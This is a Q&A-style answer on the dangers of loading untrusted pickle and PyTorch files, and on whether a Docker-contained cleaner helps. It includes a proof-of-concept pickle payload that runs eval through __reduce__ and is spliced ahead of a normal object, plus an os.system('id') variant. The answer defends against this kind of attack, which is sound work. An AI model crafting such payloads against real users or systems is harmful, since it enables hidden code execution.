As pointed out by @MobeusZoom, this answer is about Pickle, not the PyTorch format. Anyway, since the PyTorch load mechanism relies on Pickle behind the scenes, the observations drawn in this answer still apply.
TL;DR;
Don't try to sanitize pickle. Trust or reject.
Quoted from Marco Slaviero in his presentation Sour Pickle at Black Hat USA 2011.
The real solution is:
- Don't set up exchanges with unequally trusted parties;
- Set up a secure transport layer for the exchange;
- Sign exchanged files (see the sketch below).
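As an illustration of the signing point, here is a minimal sketch using the standard hmac and hashlib modules, assuming both parties share a secret key (SECRET_KEY, sign_file and verify_file are illustrative names, not from any particular library):

# sign_and_verify.py (illustrative sketch)
import hashlib
import hmac

SECRET_KEY = b"replace-with-a-shared-secret"  # assumed to be shared out-of-band

def sign_file(path):
    # HMAC-SHA256 over the raw file bytes.
    with open(path, "rb") as handler:
        return hmac.new(SECRET_KEY, handler.read(), hashlib.sha256).hexdigest()

def verify_file(path, expected_signature):
    # Constant-time comparison against the signature shipped alongside the file.
    return hmac.compare_digest(sign_file(path), expected_signature)

The point is to refuse to unpickle any file whose signature does not verify: trust or reject, never sanitize.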
Also be aware that there are new kinds of AI-based attacks; even if the pickle is shellcode-free, you may still have other issues to address when loading pre-trained networks from untrusted sources.
Important notes
From the presentation linked above we can draw several important notes:
- Pickle uses a virtual machine to reconstruct live data (the PVM runs alongside the Python process). This virtual machine is not Turing complete, but it has an instruction set (opcodes), a stack for execution and a memo to host object data. This is enough for attackers to create exploits.
- The pickle mechanism is backward compatible: the latest Python can still unpickle the very first version of the protocol.
- Pickle can (re)construct any object as long as the PVM does not crash; there is no consistency check in this mechanism to enforce object integrity.
- In broad outline, pickle allows an attacker to execute shellcode in any language (including Python), and that code can even persist after the victim program exits.
- Attackers will generally forge their own pickles because it offers more flexibility than naively using the pickle mechanism. Of course, they can still use pickle as a helper to write opcode sequences. An attacker can craft the malicious pickle payload in two significant ways:
- to prepend the shellcode so that it is executed first and leaves the PVM stack clean; then you probably get a normal object after unpickling;
- to insert the shellcode into the payload, so that it gets executed while unpickling and may interact with the memo; then the unpickled object may have extra capabilities.
- Attackers are aware of "safe unpicklers" and know how to circumvent them (a sketch of such an unpickler follows this list).
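For reference, below is a minimal sketch of the kind of "safe unpickler" mentioned in the last point, close to the RestrictedUnpickler example from the Python documentation (the allow-list content is illustrative). It rejects any global not explicitly allowed, so a payload referencing eval or os.system fails to load; keep in mind, as stated above, that attackers know how to work around overly permissive filters of this kind.

# restricted_unpickler.py (illustrative sketch)
import builtins
import io
import pickle

SAFE_BUILTINS = {"range", "complex", "set", "frozenset"}  # illustrative allow-list

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Only resolve globals from the allow-list; reject everything else.
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError("global '%s.%s' is forbidden" % (module, name))

def restricted_loads(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()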
MCVE
Find below a very naive MCVE to evaluate your suggestion of encapsulating the cleaning of suspect pickled files in a Docker container. We will use it to assess the main associated risks. Be aware that a real exploit will be more advanced and more complex.
Consider the two classes below. Normal is what you expect to unpickle:
# normal.py
class Normal:

    def __init__(self, config):
        self.__dict__.update(config)

    def __str__(self):
        return "<Normal %s>" % self.__dict__
And Exploit is the attacker's vessel for the shellcode:
# exploit.py
class Exploit(object):

    def __reduce__(self):
        return (eval, ("print('P@wn%d!')",))
Then, the attacker can use pickle as a helper to produce intermediate payloads in order to forge the final exploit payload:
import pickle
from normal import Normal
from exploit import Exploit
host = Normal({"hello": "world"})
evil = Exploit()
host_payload = pickle.dumps(host, protocol=0)  # b'(i__main__\nNormal\np0\n(dp1\nS"hello"\np2\nS"world"\np3\nsb.'
evil_payload = pickle.dumps(evil, protocol=0)  # b'c__builtin__\neval\np0\n(S"print(\'P@wn%d!\')"\np1\ntp2\nRp3\n.'
At this point the attacker can craft a specific payload that both injects the shellcode and returns the expected data:
with open("inject.pickle", "wb") as handler:
handler.write(b'c__builtin__\neval\np0\n(S"print(\'P@wn%d!\')"\np1\ntp2\nRp3\n(i__main__\nNormal\np0\n(dp1\nS"hello"\np2\nS"world"\np3\nsb.')
Now, when the victim deserializes the malicious pickle file, the exploit is executed and a valid object is returned as expected:
import pickle
from normal import Normal

with open("inject.pickle", "rb") as handler:
    data = pickle.load(handler)
print(data)
Execution returns:
P@wn%d!
<Normal {'hello': 'world'}>
Of course, the shellcode is not intended to be so obvious; you may not even notice it has been executed.
Containerized cleaner
Now, let's try to clean this pickle as you suggested. We will encapsulate the following cleaning code into a Docker image to try to contain its execution:
# cleaner.py
import pickle
from normal import Normal

with open("inject.pickle", "rb") as handler:
    data = pickle.load(handler)
print(data)

cleaned = Normal(data.__dict__)
with open("cleaned.pickle", "wb") as handler:
    pickle.dump(cleaned, handler)

with open("cleaned.pickle", "rb") as handler:
    recovered = pickle.load(handler)
print(recovered)
As a baseline Docker image, we could use something like this:
FROM python:3.9
ADD ./exploit ./
RUN chown 1001:1001 inject.pickle
USER 1001:1001
CMD ["python3", "./cleaner.py"]
Then we build the image and execute it:
docker build -t jlandercy/doclean:1.0 .
docker run -v /home/jlandercy/exploit:/exploit jlandercy/doclean:1.0
Also ensure the mounted folder containing the exploit has suitably restrictive permissions. The execution outputs:
P@wn%d!
<Normal {'hello': 'world'}> # <-- Shellcode has been executed
<Normal {'hello': 'world'}> # <-- Shellcode has been removed
Now cleaned.pickle is shellcode-free. Of course, you need to carefully check this assumption before releasing the cleaned pickle.
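One way to support that check, sketched below, is to disassemble the cleaned file with the standard pickletools module, which decodes the opcode stream without executing it. You can then review the GLOBAL/STACK_GLOBAL entries to make sure only expected classes (here normal.Normal) are referenced and that no callable such as eval or os.system appears:

# review_cleaned.py (illustrative sketch)
import pickletools

with open("cleaned.pickle", "rb") as handler:
    # dis() prints the opcode stream for manual review; it does not run the PVM.
    pickletools.dis(handler.read())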
Observations
As you can see, the Docker image does not prevent the exploit from being executed when unpickling, but it may help to contain the exploit to some extent.
Points of attention (not exhaustive):
- Having a recent pickle file written with the original protocol (protocol 0) is a hint, but not proof, of something suspicious;
- Be aware that even if containerized, you are still running attacker code on your host;
- Additionally, the attacker may have designed the exploit to break out of the Docker container; use an unprivileged user to reduce the risk;
- Don't bind any network to this container, as the attacker could start a terminal and expose it over a network interface (and potentially to the web);
- Depending on how the attacker designed the exploit, the data may not be available at all, for instance if the __reduce__ method returns only the exploit instead of a recipe to recreate the desired instance (see the sketch after this list). After all, the main purpose of such a pickle is to make you unpickle it, nothing more;
- If you intend to dump raw data after loading the suspicious pickle archive, you need a strict procedure to detach the data from the exploit;
- The cleaning step can be a limitation: it relies on your ability to recreate the intended object from the malicious payload, which depends on what is actually reconstructed from the pickle file and how the desired object's constructor needs to be parametrized;
- Finally, if you are confident in your cleaning procedure, you can mount a volume to access the result after the container exits.
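To illustrate the point about data availability, here is a minimal sketch (the NoData class and the command are hypothetical) where __reduce__ returns only the exploit. Unpickling then yields the command's exit status, and there is nothing left of the original object to clean:

# nodata.py (illustrative sketch)
import os
import pickle

class NoData(object):
    # The recipe is the exploit itself: no state of the original object is stored.
    def __reduce__(self):
        return (os.system, ("id",))

payload = pickle.dumps(NoData())
result = pickle.loads(payload)  # runs `id` and returns its exit status
print(result)                   # e.g. 0 -- an integer, not the data you hoped to recover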